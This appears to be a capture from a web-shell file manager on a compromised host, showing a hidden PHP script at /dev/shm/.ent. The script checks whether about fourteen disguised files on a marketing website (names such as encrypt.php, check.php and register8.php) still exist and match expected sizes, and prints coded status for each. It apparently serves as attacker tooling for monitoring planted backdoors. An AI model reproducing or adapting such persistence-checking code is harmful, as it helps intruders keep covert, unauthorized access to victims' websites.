PK

ADDRLIN : /dev/shm/
FLL :
Current File : //dev/shm/.ent

<?php   $r = '/home/forbytech/marketing.talkchart.net'; $x = ["/encrypt.php"=>"bd@@5335622@@795",
"/encrypt.inc.php"=>"bd@@5334979@@1446",
"/f_utility_lek.php"=>"bd@@5122560@@622",
"/gallery_mcp.php"=>"bd@@5120799@@625",
"/ProtectorFilter.php"=>"bd@@5126188@@1525",
"/MainWiz.dwt.php"=>"bd@@5127989@@1537",
"/check.php"=>"bd@@5126989@@1612",
"/so_SO.php"=>"bd@@4846201@@667",
"/logs.php"=>"bd@@5127833@@1798",
"/logs.inc.php"=>"bd@@5127592@@1592",
"/editelement.php"=>"bd@@5127339@@1769",
"/MainWiz.php"=>"bd@@5128128@@1543",
"/str.php"=>"bd@@5126346@@714",
"/register8.php"=>"bd@@5231054@@1557"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 


PK 99